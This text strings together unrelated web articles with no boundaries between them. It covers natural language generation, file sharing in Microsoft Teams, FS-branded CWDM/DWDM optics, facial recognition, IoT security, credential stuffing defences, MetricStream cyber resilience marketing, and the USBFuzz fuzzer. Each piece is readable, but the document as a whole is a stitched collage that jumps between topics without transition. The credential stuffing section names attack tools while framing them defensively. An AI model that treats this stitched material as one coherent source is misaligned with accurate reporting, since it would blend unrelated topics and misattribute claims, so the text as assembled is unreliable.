NLG, once confined to its origins in weather data interpretation, has evolved significantly. In today's dynamic landscape, NLG systems have demonstrated remarkable versatility, contributing to diverse applications. Gmail's Smart Compose feature, underpinned by NLG, offers users real-time text suggestions as they compose emails, streamlining and enhancing the composition process. Renowned organisations like the Associated Press (AP) harness Wordsmith's capabilities to automatically generate content, including earnings reports; this reduces the burden on human reporters and ensures that data-driven content reaches readers with unparalleled efficiency. GPT-3, an advanced language prediction model, has emerged as a powerful asset for content generation, excelling at producing coherent blog posts, press releases, technical manuals, and data-driven narratives, often with impressive accuracy. This diverse skill set enables marketers to transform structured information into data-rich narratives. Voice-activated digital assistants, as exemplified by Apple's Siri and Amazon's Alexa, leverage NLG to provide concise and informative responses to user queries; the underpinning NLG technology ensures seamless interactions between users and these virtual assistants. NLG also plays an instrumental role in shaping chatbot interactions, empowering chatbots to comprehend user inputs and generate contextually relevant and coherent responses, elevating the quality of user engagement.

The successful integration of NLG within an organisational framework necessitates a systematic approach. The selection of an NLG solution warrants a comprehensive assessment encompassing compatibility with existing systems, scalability, and alignment with the overarching strategic objectives of the organisation. Seamless integration also calls for a well-thought-out implementation plan, incorporating user training and adoption considerations.

In summary: NLG systems utilise predefined templates and rules to structure and generate text, and NLG-driven processes can condense information about specific events into concise summaries. Ongoing developments and improvements in AI technology continue to expand NLG system capabilities, and collaborative efforts between humans and NLG systems promise to enhance creativity and efficiency in content creation and data analysis.
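To make the "templates plus rules" mechanism described earlier concrete, here is a minimal sketch of template-based generation in Python. The record fields, thresholds and wording rules are invented for illustration and do not reflect any particular commercial NLG product.

```python
# Minimal sketch of template-and-rules NLG: structured data in,
# human-readable sentence out. All field names and rules here are
# illustrative assumptions, not any vendor's actual implementation.

def describe_quarter(record: dict) -> str:
    """Render one revenue record as a short narrative sentence."""
    change = record["revenue"] - record["prior_revenue"]
    pct = 100.0 * change / record["prior_revenue"]
    # A simple linguistic rule: choose the verb from the data.
    if pct >= 5:
        verb = "jumped"
    elif pct > 0:
        verb = "edged up"
    else:
        verb = "fell"
    template = "{company} revenue {verb} {pct:.1f}% to ${revenue:,} in {quarter}."
    return template.format(
        company=record["company"], verb=verb, pct=abs(pct),
        revenue=record["revenue"], quarter=record["quarter"],
    )

print(describe_quarter({
    "company": "ExampleCorp", "quarter": "Q3",
    "revenue": 1_250_000, "prior_revenue": 1_100_000,
}))
# -> "ExampleCorp revenue jumped 13.6% to $1,250,000 in Q3."
```

Production systems layer far richer grammar, referring-expression and document-planning rules on top, but the pipeline is the same: analyse the data, pick wording by rule, and fill a template.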
Written by: Jay H.

Microsoft Teams is a powerful collaboration tool that allows teams to communicate, collaborate, and share files seamlessly. Let's explore how to share files in Teams in chat, channels, and meetings, as well as how to work on files in Teams without leaving the app.

Sharing Files in Chat

Sharing files in chat is simple in Teams. To share a file, start by opening a chat with the person or group you want to share the file with. Next, click on the paperclip icon in the message box to attach a file. You can then select a file from your computer or OneDrive, or you can drag and drop a file directly into the chat window. Once you've attached the file, you can add a message to accompany it and click the send button to share it. The file will be uploaded to the chat, and the recipient(s) will be able to download and view it.

Sharing Files in Channels

Channels are a great way to organize conversations and collaborate on specific topics. To share a file in a channel, start by navigating to the channel where you want to share the file. Next, click on the Files tab at the top of the channel. From here, you can either upload a new file or select an existing file from the channel's shared files. To upload a new file, click on the Upload button and select the file from your computer or OneDrive. To select an existing file, simply click on the file to open it. Once the file is uploaded or selected, you can add a message to accompany it and click the send button to share it with the channel members. The file will be added to the channel's shared files, and the members will be able to access it.

Sharing Files in Meetings

Meetings in Teams allow you to collaborate with your team members in real time. To share a file in a meeting, start by joining the meeting and clicking on the Share content button in the meeting controls. Next, select the file you want to share from your computer or OneDrive. You can then choose to share your entire screen, a specific window, or just the file itself. Once you've selected the sharing option, click on the Share button to share the file with the meeting participants. The file will be displayed on the meeting screen, and participants will be able to view it.

Working on Files in Teams

One of the great features of Teams is that you can work on files without leaving the app. To do this, simply click on the file you want to work on in a chat, channel, or meeting. The file will open in the Teams app, and you'll be able to edit it using the familiar Office tools. When you're done editing the file, simply save it and it will be automatically updated in the chat, channel, or meeting. This makes collaborating on files in Teams seamless and efficient.

In conclusion, sharing files in Teams is easy and efficient. Whether you're sharing files in chat, channels, or meetings, or working on files without leaving the app, Teams has you covered. By using these features, you can collaborate with your team members more effectively and get work done faster.

If you or your organization needs support for Microsoft Teams or other applications, please contact our professional technical support now for help.
In telecommunications, data centre connectivity, and video transport, fibre optic cabling is highly desirable for today's communication needs because of its enormous bandwidth. Because fibre cabling can be expensive to deploy, wavelength division multiplexing (WDM) is highly advisable, for it can expand the capacity of existing fibres. This article describes one kind of WDM: coarse wavelength division multiplexing (CWDM), which works efficiently and at lower cost in short-haul networks in comparison with DWDM (dense WDM).

CWDM is a method of combining multiple signals on laser beams at various wavelengths for transmission along fibre optic cables. Compared to DWDM, which is a more tightly packed WDM system, CWDM has larger channel spacing, so fewer wavelengths can be transported on the same fibre. For instance, CWDM typically has channels at wavelengths spaced 20 nanometres (nm) apart, compared with 0.4 nm spacing for DWDM. DWDM can typically transmit from 32 to 128 channels and can use erbium-doped fibre amplifiers to boost the signal over long distances, which makes it ideal for long-haul networks. In contrast, CWDM can transmit a maximum of 18 channels, and its wide channel spacing places many channels outside the band of erbium-doped fibre amplifiers, so optical amplification cannot be used in a CWDM system. CWDM is therefore typically deployed in short-haul networks.

Cost Comparison of WDM Technologies

Due to its broader channel spacing, CWDM has a cost advantage over DWDM. CWDM systems can use less precise lasers spread over a larger range of wavelengths, consuming less power with low losses. For example, both DWDM and CWDM utilise distributed feedback (DFB) lasers. However, DWDM requires larger, cooled DFB lasers because laser wavelengths drift about 0.08 nm/°C with temperature. CWDM uses uncooled DFB lasers: laser wavelengths drift about 6 nm over the range of 0-70°C, and the lasers' tolerance (the extent of wavelength imprecision or variability) in a CWDM system is up to ±3 nm. The use of uncooled lasers lowers power consumption, which has positive financial implications for systems operators. For instance, battery costs fall as power consumption decreases, reducing operating costs. In short, CWDM is the technology of choice for cost-efficiently transporting data traffic in short-haul networks. And as the demand for bandwidth is pushed to the edge of the network, the need for low-cost transport systems is imperative.

FS offers a wide range of CWDM products, such as low-cost CWDM MUX/DEMUX units, CWDM OADMs in various configurations, and CWDM transceivers (SFP, SFP+, XFP, GBIC, X2, XENPAK) supporting 155 Mbps to 10 Gbps data transmission. Compatible CWDM transceivers are strongly recommended; FS stocks CWDM transceivers compatible with famous brands such as Cisco, HP, and Juniper. All these CWDM transceivers are of high quality and capacity and can transport data traffic at low cost. For more information, you can visit the FS online shop.

The passive WDM network building block aggregates wavelengths of light from several transmitter sources and transmits the combined light into one fibre. Each wavelength of light remains unchanged and transparent in the presence of neighbouring wavelengths. An optical prism is a convenient way to understand the MUX/DEMUX function. When a multi-colour light beam passes through an optical prism, the prism's material properties and geometry cause light of different colours to exit at different angles, becoming, in WDM terminology, demultiplexed. Conversely, when several light beams of different colours enter the prism at designated angles, they exit the prism at the same angle as a single light beam, becoming, in WDM terminology, multiplexed.

CWDM MUX and DEMUX

The passive CWDM MUX building block aggregates wavelengths of light from several transmitter sources (TX) and transmits the combined light into one fibre. Each wavelength of light remains unchanged and transparent in the presence of neighbouring wavelengths. Typically, CWDM MUX and DEMUX modules are designed with a minimum of 4 channels and a maximum of 16 channels.

CWDM Optical Add & Drop is an ideal solution for the increasing bandwidth demand on enterprise and metro access networks. ESCON, ATM, Fibre Channel, and Gigabit Ethernet are supported simultaneously, without disturbing each other. An OADM is typically illustrated in a protected ring system. OADMs provide access to a single wavelength or more of a wavelength-multiplexed system, increasing networking possibilities. Although this greatly improves the flexibility of CWDM, the insertion loss of these devices poses a challenge for the design of rings, as CWDM uses no optical amplification to overcome losses.

DWDM MUX and DEMUX

In general, a CWDM (coarse WDM) MUX/DEMUX deals with small numbers of wavelengths, typically eight, but with large spans between wavelengths (spaced typically at around 20 nm). A DWDM (dense WDM) MUX/DEMUX deals with narrower wavelength spans (as small as 0.8 nm, 0.4 nm, or even 0.2 nm) and can accommodate 40, 80, or even 160 wavelengths. The 100 GHz DWDM OADM is configurable as both an OADM and a terminal multiplexer/demultiplexer (MUX/DEMUX) to support a broad range of architectures, ranging from scalable point-to-point links to four-fibre protected rings. The FS 100 GHz Optical Add/Drop Modules (OADMs) offer a family of flexible, low-cost solutions to enable capacity expansion of existing fibre, and are designed to optically add/drop one or multiple DWDM channels into one or two fibres.

CWDM and DWDM Transceivers

Compact transceivers are particularly useful when operating on bidirectional links, since each site comprises a transmitter as well as a receiver: the laser, receiver diode, and the relevant electronics for driving the laser and shaping the received signal are integrated in a small form factor module with a standardized interface. CWDM transceivers typically use directly modulated DFB lasers operating at 2.5 Gb/s and PIN receivers with a receiver module and decision circuit. The modulated output power ranges from 0 to 3 dBm, although it can be reduced at elevated temperatures, since no active cooling of the devices is available in the lower-cost design. The PIN receiver sensitivity of the transceivers is around -24 to -26 dBm, so a link budget of at least 24 dB should be available, which can be used to accommodate both the insertion loss of components (multiplexers, fibre) and penalties due to the interaction of fibre dispersion and laser chirp. At lower bit rates, the link budget increases, up to 32 dB at 1.25 Gb/s.

FS WDM transceivers embed transmitter and receiver functions in a single packaged module, come in different grades of performance, and have been integrated into WDM networks for point-to-point links, metro and core networks, and storage area network (SAN) applications such as data-centre mirroring. FS supplies 1.25 Gbps (Gigabit), 2.5 Gbps, 4G, and 10G CWDM and DWDM transceiver modules, which enable the use of CWDM/DWDM solutions in uncontrolled-environment applications. CWDM transceivers can operate on 9/125 µm single-mode fibre up to 40 km or 80 km by using the dedicated CWDM channels (1270 nm to 1610 nm, in steps of 20 nm). Likewise, DWDM transceivers can support a link length of up to 40 km or 80 km on single-mode fibre by using the dedicated DWDM channels (100 GHz ITU grid, CH17 to CH61). All CWDM and DWDM transceivers from FS support DDM (Digital Diagnostic Monitoring), and they are compliant with the Multi-Source Agreement (MSA), ensuring compatibility with a wide range of fibre optic networking equipment.

Other Building Blocks on FS

1G/2G/4G/10G Transponders (OEO)

Transponders are usually used in applications where the link length is much longer than what the power budget allows, or where there is no direct fibre path between the two end nodes. OEO means optical-to-electrical-to-optical and is one type of transponder: it converts an optical signal to an electrical signal and then back to an optical signal. It allows for add/drop functionality in addition to simple optical relay or transponder operation. FS supplies 1G, 2G and 4G OEOs, 125M-4.25G OEO converters, and 125M-1.25G OEO converters, such as SFP-to-SFP optical-electrical-optical media converters/repeaters, to meet different requirements. The 10G OEO converter is used in telecommunication rooms, R&D laboratories, data centres, and even for 1310 nm/1550 nm/CWDM/DWDM optical wavelength conversion. It supports multi-protocol 10G data rates including SDH/SONET STM-64/OC-192, 10G Ethernet, and 10G Fibre Channel. FS supplies high-quality 10G transponders, such as XFP-to-XFP, SFP+-to-XFP, or SFP+-to-SFP+ optical-electrical-optical media converters/repeaters. They connect fibre-to-fibre 10 Gbps equipment, functioning as fibre mode converters/repeaters for long-distance transmission.

For a complete listing of FS WDM products, refer to the latest guide on www.fs.com or contact us at firstname.lastname@example.org.
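The link budget arithmetic quoted above for CWDM transceivers is easy to check with a few lines of code. The sketch below uses the figures from this article (0 dBm launch power, -24 dBm receiver sensitivity); the per-component loss figures are placeholder assumptions for illustration, not FS specifications.

```python
# Back-of-the-envelope CWDM link budget check, using the article's
# figures: 0 dBm launch power and -24 dBm receiver sensitivity give
# a 24 dB budget. The loss figures below are illustrative
# assumptions, not specifications for any particular product.

TX_POWER_DBM = 0.0            # modulated output power (low end)
RX_SENSITIVITY_DBM = -24.0    # PIN receiver sensitivity

FIBRE_LOSS_DB_PER_KM = 0.25   # typical single-mode loss near 1550 nm
MUX_INSERTION_LOSS_DB = 2.5   # assumed CWDM MUX loss
DEMUX_INSERTION_LOSS_DB = 2.5 # assumed CWDM DEMUX loss
DISPERSION_PENALTY_DB = 2.0   # allowance for chirp/dispersion penalty
MARGIN_DB = 3.0               # safety margin

def max_reach_km() -> float:
    budget = TX_POWER_DBM - RX_SENSITIVITY_DBM           # 24 dB
    fixed = (MUX_INSERTION_LOSS_DB + DEMUX_INSERTION_LOSS_DB
             + DISPERSION_PENALTY_DB + MARGIN_DB)        # 10 dB
    return (budget - fixed) / FIBRE_LOSS_DB_PER_KM       # km of fibre

print(f"Estimated maximum reach: {max_reach_km():.0f} km")
# -> roughly 56 km with these assumptions, in the same ballpark as
#    the 40 km / 80 km reaches quoted for commercial CWDM optics.
```

This also shows why the 32 dB budget available at 1.25 Gb/s matters: every extra decibel of budget buys about 4 km of reach at these fibre losses.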
When you post a photo on Facebook and the platform automatically tags the people in the image, you might not give much thought to the technology behind the convenience. However, when you discover that facial recognition technology could track you without your permission while you walk down a street in London, it might make you question the invasion of your privacy. Just like any other new technology, facial recognition brings positives and negatives with it. Since it's here to stay and expanding, it's good to be aware of the pros and cons of facial recognition.

What is facial recognition, and how does it work?

Facial recognition is a biometric technology that uses distinguishable facial features to identify a person. Allied Market Research expects the facial recognition market to grow to $9.6 billion by 2022. Today, it's used in a variety of ways: allowing you to unlock your phone, go through security at the airport, and purchase products at stores. In the case of entertainer and musician Taylor Swift, it was used to identify whether her known stalkers came through the gate at her Rose Bowl concert in May 2018.

Today, we are inundated with data of all kinds, but the plethora of photo and video data available provides the dataset required to make facial recognition technology work. Facial recognition systems analyse millions of images and videos created by high-quality closed-circuit television (CCTV) cameras installed in our cities for security, as well as visual data from smartphones, social media, and other online activity. Machine learning and artificial intelligence capabilities in the software map distinguishable facial features mathematically, look for patterns in the visual data, and compare new images and videos to other data stored in facial recognition databases to determine identity.

Pros of facial recognition

One of the major advantages of facial recognition technology is safety and security. Law enforcement agencies use the technology to uncover criminals or to find missing children or seniors. In New York, police were able to apprehend an accused rapist using facial recognition technology within 24 hours of an incident where he threatened a woman with rape at knifepoint. In cities where police don't have time to help fight petty crime, business owners are installing facial recognition systems to watch people and identify subjects of interest when they come into their stores.

Airports are increasingly adding facial recognition technology to security checkpoints; the U.S. Department of Homeland Security predicts that it will be used on 97 percent of travellers by 2023. When people know they are being watched, they are less likely to commit crimes, so the possibility of facial recognition technology being used could deter crime.

Since there is no contact required for facial recognition, as there is with fingerprinting or other security measures, facial recognition offers a quick, automatic, and seamless verification experience. There is no key or ID card that can be lost or stolen.

Facial recognition can also add conveniences. In addition to helping you tag photos in Facebook or your cloud storage via Apple and Google, you will start to be able to check out at stores without pulling out money or credit cards; your face will be scanned. At the A.I. Bar, facial recognition technology is used to add patrons who approach the bar to a running queue so they get served their drinks more efficiently. Although it is possible, it's hard to fool facial recognition technology, so it can also help prevent fraud.

Cons of facial recognition

The biggest drawback of facial recognition technology, in most people's opinion, is the threat to an individual's privacy. In fact, several cities have banned or are considering banning real-time facial recognition surveillance by law enforcement, including San Francisco and Cambridge, Massachusetts. These municipalities determined that the risks of using the technology outweighed the benefits. Police can still use footage from personally owned devices such as Nest cameras to find criminals; the bans simply prevent government entities from using live facial recognition software.

While London's King's Cross is using facial recognition, London is also at the forefront of democratic societies in its testing of the technology. In test events, the city hopes to determine the accuracy of the systems while grappling with how to deal with individuals who cover up to hide their identity from cameras, among other issues. Additionally, democratic societies must define the legal basis for live facial recognition of the general population, and when blanket use of the technology is justified.

The technology isn't as effective at identifying people of colour and women as it is at identifying white males. One reason for this is that the data sets the algorithms are trained on are not as robust for people of colour and women. Until this is rectified, there are concerns about the ramifications of misidentifying people with the technology. In addition, there are issues still to be resolved that can throw off the technology, such as when a person changes appearance or the camera angle isn't quite right (although researchers are working on being able to identify a person by only their earlobe). Accuracy is dramatically improving; according to independent tests by the U.S. National Institute of Standards and Technology (NIST), facial recognition systems got 20 times better at finding a match in a database over a period that covered 2014 to 2018.

Another potential downside is the storage of sensitive personal data and the challenges that come with it. Just last week came the news that a database containing facial scans used by banks, police forces, and defence firms was breached.

In order to benefit from the positive aspects of facial recognition, our society is going to have to work through some significant challenges to our privacy and civil liberties. Will individuals accept the invasion of their privacy as a reasonable cost of being more secure and for the conveniences facial recognition provides?
Security is a hugely important issue for the Internet of Things (IoT). And, according to experts, a lot of work remains to be done.

Julie Knudson, writing at Enterprise Networking Planet, puts the situation in stark terms. She writes that not only are there no universal standards, but that even within individual categories, such as sensors, manufacturers have taken a proprietary approach to security. This is a yellow flag because it will make it more difficult to universally deploy a specific approach to security once one is decided upon.

The bottom line: this is scary stuff. The problems caused by a lack of security became pretty clear earlier this month when a hacker claimed that he could take control of a commercial airplane. Other stories, such as hacking into a car and disabling the brakes, show the extent of the risks. Something as simple as de-synchronizing lights on IoT-connected traffic control networks could wreak havoc.

David Navetta and Seth Jaffe, analysts writing on the Norton Rose Fulbright Blog Network, noted that implementing IoT security poses particular problems and challenges for a couple of reasons. Commonalities in design enable one type of hack to be used to compromise many different types of devices. Added to this is the fact that the inexpensive nature of most devices disincentivizes patching. That dynamic will keep vulnerable devices in the field well past the time that a fix is available.

The good news, at least according to Debra Donston-Miller at CIO, is that the challenge, though intimidating, is not insurmountable. The first step is for IT departments to approach things with a healthy dose of skepticism and to not assume that a particular IoT network connection is secure. Now more than ever, it is imperative to have a data security policy in place, especially with the rise of IoT.

For one thing, the collective size of the Internet of Things industry means that it will be deeply enmeshed in just about every crevice of everyday life. Many of these uses will be of marginal importance: nobody is going to hack somebody's alarm clock to change the radio station. However, many, from the power grid to health care, will be life-and-death matters. On top of that, there will be such a pervasive layer of things that need to be secure that implementing security after deployment will be challenging, even once approaches are agreed upon.

It is clear that vehicles are one place where the Internet of Things is particularly common, and one in which its various implementations, from essentially frivolous entertainment to vital safety, come together. Thus, a vehicle is a good place to look to see where this is going. Alexandre Palus, the automotive architecture and enablement manager at Freescale, suggests steps for facilitating IoT security in vehicles. He suggests implementing security at every level, from chip to finished product, and keeping an especially close eye on the human element. He also advises the industry to continue working on standards and to aim for those with a long lifespan. Designers should be educated on security issues.

There are some common-sense steps that organizations can take at this point. Before diving deeply into IoT deployments, the company's IT department should sit down with potential vendors and have a deep discussion about security. How are the devices secured today? How is the connection between the sensor or other IoT-enabled element and the data collection point secured? What organizations and consortiums is the vendor involved in? Are the products architected in such a way that security can be seamlessly integrated once standards emerge?
Credential stuffing is a type of cyberattack where stolen account credentials, typically consisting of lists of usernames and/or email addresses and the corresponding passwords (often from a data breach), are used to gain unauthorized access to user accounts through large-scale automated login requests directed against a web application. According to OWASP, credential stuffing is the automated injection of breached username/password pairs in order to fraudulently gain access to user accounts. This is a subset of the brute force attack category: large numbers of spilled credentials are automatically entered into websites until they are potentially matched to an existing account, which the attacker can then hijack for their own purposes.

Unlike credential cracking, credential stuffing attacks do not attempt to brute-force or guess any passwords; the attacker simply automates the logins for thousands to millions of previously discovered credential pairs using standard web automation tools like Selenium, cURL, and PhantomJS, or tools designed specifically for these types of attacks, such as Sentry MBA, SNIPR, STORM, Blackbullet, and Openbullet.

Credential stuffing attacks are possible because many users reuse the same username/password combination across multiple sites, with one survey reporting that 81% of users have reused a password across two or more sites and 25% of users use the same password across a majority of their accounts.

How credential stuffing attacks work

Credential stuffing is a cyberattack in which credentials obtained from a data breach of one service are used to attempt to log in to another, unrelated service. Credential stuffing attacks are launched through botnets and automated tools that support the use of proxies to distribute the rogue requests across different IP addresses. Furthermore, attackers often configure their tools to mimic legitimate user agents, the headers that identify the browsers and operating systems web requests are made from.

Over a 17-month period, from November 2017 through the end of March 2019, security and content delivery company Akamai detected 55 billion credential stuffing attacks across dozens of verticals. While some industries were more heavily targeted than others, for example gaming, retail, and media streaming, no industry was immune.

The Ponemon Institute's Cost of Credential Stuffing report found that businesses lose an average of $4 million per year to credential stuffing. These losses take the form of application downtime, lost customers, and increased IT costs. Large-scale botnet attacks can overwhelm a business's IT infrastructure, with websites experiencing as much as 180 times their typical traffic during an attack. And despite the uptick in reported attacks, it's safe to assume that many businesses do not disclose when their systems are compromised and their internal data is stolen, so we may never know the full cost.

Detecting and preventing credential stuffing attacks

There are multiple ways to try to detect a credential stuffing attack:
- Monitor for an abnormal number of login attempts on an account from a single endpoint (a minimal sketch of this kind of check appears near the end of this article).
- Monitor access attempts to multiple accounts from a single endpoint.
- Detect known malicious endpoints attempting to use credentials, via their IP addresses or fingerprinting techniques.
- Detect the use of automation software in the login process.
- Remove credential-based login and replace it with passwordless authentication.

How users can protect themselves

Here are some recommendations for individual users about how they can protect themselves:
- Avoid reusing passwords: Use a unique password for each account you use online. That way, even if your password leaks, it can't be used to sign in to other websites. Attackers can try to stuff your credentials into other login forms, but they won't work.
- Use a password manager: Remembering strong unique passwords is a nearly impossible task if you have accounts on quite a few websites, and almost everyone does. We recommend using a password manager like 1Password (paid) or Bitwarden (free and open-source) to remember your passwords for you. It can even generate those strong passwords from scratch.
- Enable two-factor authentication: With two-step authentication, you have to provide something else, like a code generated by an app or sent to you via SMS, each time you log in to a website. Even if an attacker has your username and password, they won't be able to sign in to your account if they don't have that code.
- Get leaked password notifications: With a service like Have I Been Pwned?, you can get a notification when your credentials appear in a leak.

How companies can protect themselves against credential stuffing

Use multi-factor authentication

Multi-factor authentication (MFA) is by far the best defense against the majority of password-related attacks, including credential stuffing and password spraying. As such, it should be implemented wherever possible; however, depending on the audience of the application, it may not be practical or feasible to enforce the use of MFA.

Block or sandbox suspicious IPs

Attackers will typically have a limited pool of IP addresses, so another effective defense is to block or sandbox IPs that attempt to log into multiple accounts. You can monitor the last several IPs that were used to log into a specific account and compare them to the suspected bad IP to reduce false positives.

Use CAPTCHAs

Requiring a user to solve a CAPTCHA for each login attempt can help to prevent automated login attempts, which would significantly slow down a credential stuffing or password spraying attack. However, CAPTCHAs are not perfect, and in many cases tools exist that can be used to break them with a reasonably high success rate. To improve usability, it may be desirable to only require the user to solve a CAPTCHA when the login request is considered suspicious.

Align Website Architecture with Different Types of Clients

If achieving the smallest possible attack surface is your goal, then the ideal solution has to align the website architecture with different types of clients. Some organizations have already done this to varying degrees. Others may need to rearchitect their website in order to do so. Breaking existing endpoints into separate URLs helps reduce the attack surface by providing the most granular control of transactional URL traffic. For example, you might segment your clients by URL as follows:
- URL 1: Humans on desktop, laptop, and mobile browsers
- URL 2: Native mobile apps
- URL 3: Automated third-party services, such as industry aggregators and partners

With this approach, you will be able to apply the appropriate bot detection to URL 1 and URL 2 and force other types of consumers to URL 3. While you can't use behavioral anomaly bot detection to protect URL 3, you can control the data and application features available to its users.
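As a concrete illustration of the monitoring-based detections listed earlier, here is a minimal sketch of a sliding-window login monitor in Python. The window size and thresholds are illustrative assumptions, not recommendations from OWASP or any vendor; a production system would persist this state and combine it with other signals.

```python
# Minimal sketch: flagging possible credential stuffing by counting
# failed logins per source IP in a sliding time window. Thresholds
# and window size are illustrative assumptions, not recommendations
# from any specific product or standard.
import time
from collections import defaultdict, deque

WINDOW_SECONDS = 300   # look at the last 5 minutes
MAX_FAILURES = 20      # failed logins per IP before we flag it
MAX_ACCOUNTS = 5       # distinct accounts per IP before we flag it

failures = defaultdict(deque)  # ip -> timestamps of failed logins
accounts = defaultdict(set)    # ip -> account names attempted
                               # (a real system would also expire these)

def record_failed_login(ip: str, username: str) -> bool:
    """Record a failed login; return True if the IP looks automated."""
    now = time.time()
    q = failures[ip]
    q.append(now)
    accounts[ip].add(username)
    # Drop events that fell out of the sliding window.
    while q and now - q[0] > WINDOW_SECONDS:
        q.popleft()
    # Many failures, or failures spread across many accounts, from a
    # single endpoint are both classic credential stuffing signals.
    return len(q) >= MAX_FAILURES or len(accounts[ip]) >= MAX_ACCOUNTS
```

A flagged IP would then feed the responses described above: step-up to a CAPTCHA or MFA challenge, sandbox the traffic, or block outright.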
Credential stuffing attacks pose a significant cyber threat not only to individuals but also to companies. If you have any questions about how we can help you protect your website and business from cyberattacks, contact us today and we will help you with your performance and security needs.
With the growing frequency and sophistication of cyberattacks, cybersecurity leaders are on high alert to implement and maintain an effective and sound cybersecurity program. Cyber risks, and the challenge of ensuring robust cyber health, are further exacerbated as the digital interconnectivity of people, processes, and organizations continues to intensify.

Cyberattacks are growing at an alarming rate and show no signs of slowing down. Attacks on web applications alone surged by a whopping 800% in the first half of 2020, according to a report by CDNetworks. The Center for Strategic & International Studies (CSIS) estimates that cybercrime costs the world nearly $600 billion every year. Furthermore, private sector companies are expected to lose $5.2 trillion in revenue to cybersecurity attacks over the course of five years, from 2019 to 2023, as per a report from Accenture.

It is important to note here that organizations are often not the victims of a targeted attack, such as hacks, DDoS (Distributed Denial-of-Service) attacks, and others. Untargeted attacks, such as those carried out via malware (worms, spyware, adware, computer viruses, etc.) and phishing emails, are not directed at any specific person or business and are more common. These attacks indiscriminately infect devices, casting as wide a net as possible. According to CSO Online, phishing attacks account for over 80% of reported security incidents.

Today, organizations simply cannot assume that they can build an impenetrable cyber defense mechanism. As such, the global narrative has been gradually shifting from cybersecurity to cyber resilience in recent years: focusing not just on averting cyber breaches but also on designing a strategy to minimize impact and potential loss and to ensure continued business operations during an attack. As cybercrime incidents continue to proliferate across the globe, achieving cyber certainty seems to be a pipe dream for companies. Achieving cyber resilience, however, is not only a realistic goal but also indispensable for businesses to thrive in this digital era.

The path to cyber resilience starts with identifying the cyber threats an organization is exposed to (such as ransomware, malware, and phishing attacks), prioritizing the risks by their impact and probability of occurrence, and devising an effective response plan. In today's digitized world, checking an organization's cyber health has become an iterative process requiring continuous monitoring of business processes and IT infrastructure to identify and address any vulnerable areas or loopholes.

Achieving sound cyber resilience can be a daunting proposition for any organization. It has been noted that organizations quite often rely more on tools and techniques for building cyber resilience capabilities than on the expertise of people and well-designed processes. The best practice is to find the right mix of people, processes, and technology while devising a cyber resilience management framework. A cyber resilience framework is a structured approach that helps organizations proactively prepare for, effectively respond to, and swiftly recover from cyberattacks. It provides a comprehensive strategy to manage cyber risks. An effective cyber resilience management program also requires integrating cybersecurity into business strategy and engaging the entire spectrum of stakeholders in the process for better decision-making.

MetricStream is helping organizations achieve cyber resilience in a simplified and streamlined manner, saving time, effort, and resources. With the MetricStream CyberSecurity Solution, organizations can proactively anticipate and mitigate IT and cyber risks, threats, and vulnerabilities; gain a 360-degree, real-time view of IT risk, compliance, policy management, and IT vendor posture; and implement an effective business continuity and disaster recovery program.

International standard-setting bodies and national-level regulatory bodies regularly publish policies, guidelines, best practices, and more to help organizations prevent or mitigate cyberattacks. The International Organization for Standardization (ISO), an international standard-setting body composed of representatives from various national standards organizations, has published ISO/IEC 27001, which specifies requirements for an information security management system (ISMS). There is also the ISA/IEC 62443 series of standards, developed by the ISA99 committee, which provides a framework to address and mitigate existing and future security vulnerabilities in industrial automation and control systems (IACSs). In addition to these global standards, there are various national standards, such as the NIST Cybersecurity Framework and the Cybersecurity Maturity Model Certification (CMMC) in the United States, Cyber Essentials in the United Kingdom, and the BSI IT Baseline Protection Catalogs in Germany, which are intended to strengthen the cyber resilience of organizations operating in these countries.

Governments have also put into effect various cybersecurity regulations that govern the cybersecurity measures implemented by organizations. In the U.S., for example, healthcare organizations have to comply with the Health Insurance Portability and Accountability Act (HIPAA), while financial institutions have to adhere to the Gramm-Leach-Bliley Act. Organizations in the European Union have to adhere to the Network and Information Security (NIS) Directive, the EBA ICT guidelines, the General Data Protection Regulation (GDPR), and other such regulations.

In 2020, the World Economic Forum created the Partnership against Cybercrime initiative, which aims to explore ways to support and strengthen public-private cooperation against cybercrime and overcome existing barriers to cooperation. Such initiatives are particularly important for reinforcing the fight against cybercrime by businesses and regulators alike.

The lack of a mature cyber resilience program, and the resulting inability to thwart cyberattacks or minimize their impact, can lead not only to regulatory fines and penalties but also to reputational damage, loss of customer trust, and even threats to the very existence of a company. Public-private collaborative efforts to fight cybercrime, bringing together their respective strengths, capabilities, and resources, could go a long way toward controlling the growing menace of cybercrime.

To learn more about cyber resilience, read MetricStream's eBook, A Shift from Cybersecurity to Cyber Resilience, which delves into the growing focus on cyber resilience management and the importance of cyber risk quantification, and provides quick tips on cyber resilience best practices and how to combat cyberattacks effectively with a cybersecurity incident response program.
Academics say they have found 26 new vulnerabilities in the USB driver stacks that operating systems like Linux, macOS, Windows, and FreeBSD employ. The research team, consisting of Purdue University's Hui Peng and the Swiss Federal Institute of Technology Lausanne's Mathias Payer, said all the bugs were found using a new tool they developed, called USBFuzz.

The tool is what security practitioners call a fuzzer. Fuzzers are applications that allow security researchers to submit large quantities of null, malformed, or random data into other programs as inputs. Security researchers then analyze how the software under test behaves, enabling the discovery of new bugs, some of which may be maliciously exploitable.

A New Portable USB Fuzzer Built by Academics

Peng and Payer created USBFuzz, a new fuzzer designed specifically for testing the USB driver stacks of modern-day operating systems. "USBFuzz uses a software-emulated USB device at its heart to provide drivers with random device data (when they conduct IO operations)," the investigators said. "As the emulated USB interface works at system level, it is straightforward to port it to other platforms."

This enabled the research team not only to test USBFuzz on Linux, where most fuzzer programs work, but on other operating systems too. The researchers said USBFuzz was tested on:
- 9 recent versions of the Linux kernel: v4.14.81, v4.15, v4.16, v4.17, v4.18.19, v4.19, v4.19.1, v4.19.2, and v4.20-rc2 (the latest version at the time of evaluation)
- FreeBSD 12 (the latest release)
- macOS 10.15 Catalina (the latest release)
- Windows (both versions 8 and 10, with the most recent security updates installed)

Study Team Finds 26 New Bugs

After their experiments, the research team said they found a total of 26 new bugs with the help of USBFuzz. The researchers found one bug in FreeBSD, three in macOS (two resulting in an unplanned reset and one in a system freeze), and four in Windows 8 and 10 (resulting in Blue Screens of Death). But the vast majority, and the most serious, of the bugs were found in Linux: 18 in all. Sixteen were high-impact memory bugs in different Linux subsystems (USB core, USB sound, and network), one resided in the Linux USB host controller driver, and the last was in a USB camera driver.

